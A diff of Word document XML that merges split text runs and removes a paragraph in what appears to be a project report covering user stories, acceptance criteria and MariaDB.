-        <w:t>These user stories clearly define what features they may want and why. By identifying users' needs with user stories, teams can focus on producing higher-quality products and services.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-      </w:pPr>
       <w:bookmarkStart w:id="25" w:name="_Toc116304448"/>
       <w:r>
         <w:t>Acceptance criteria</w:t>
@@ -6633,10 +6571,7 @@
         <w:t xml:space="preserve"> to recognize which measurements they can use to evaluate the progress of a task. Here are a few instances of </w:t>
       </w:r>
       <w:r>
-        <w:t>acceptance criteria</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
+        <w:t>acceptance criteria:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6996,13 +6931,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB is a fork of the MySQL database the board framework. The RDBMS offers information handling abilities for both little and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>endeavour</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> undertakings.</w:t>
+        <w:t>MariaDB is a fork of the MySQL database the board framework. The RDBMS offers information handling abilities for both little and endeavour undertakings.</w:t>
       </w:r>
     </w:p>
     <w:p>
